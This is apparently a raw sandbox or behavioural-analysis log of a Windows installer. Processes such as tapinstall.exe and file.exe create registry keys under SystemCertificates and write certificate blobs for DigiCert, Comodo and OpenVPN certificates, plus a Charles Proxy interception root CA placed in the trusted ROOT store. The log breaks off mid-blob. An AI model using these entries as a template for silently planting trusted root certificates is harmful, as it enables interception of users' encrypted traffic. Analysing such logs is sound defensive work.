93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be vpn.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c00000001000000040000000008000004000000010000001000000087ce0b7b2a0e4900e158719b37a893720300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 tapinstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA tapinstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD Setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC vpn.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f vpn.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d4304000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 tapinstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 file.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA vpn.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 0f00000001000000200000002dc1a6a6cb0cb42f7e0d2c56f38bc7decbccd143405f669070ce130f9249ba48030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e file.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576 Setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0f00000001000000140000001b4e387db74a69a0470cb08f598beb3b511617530300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f006600200074006800650020004400690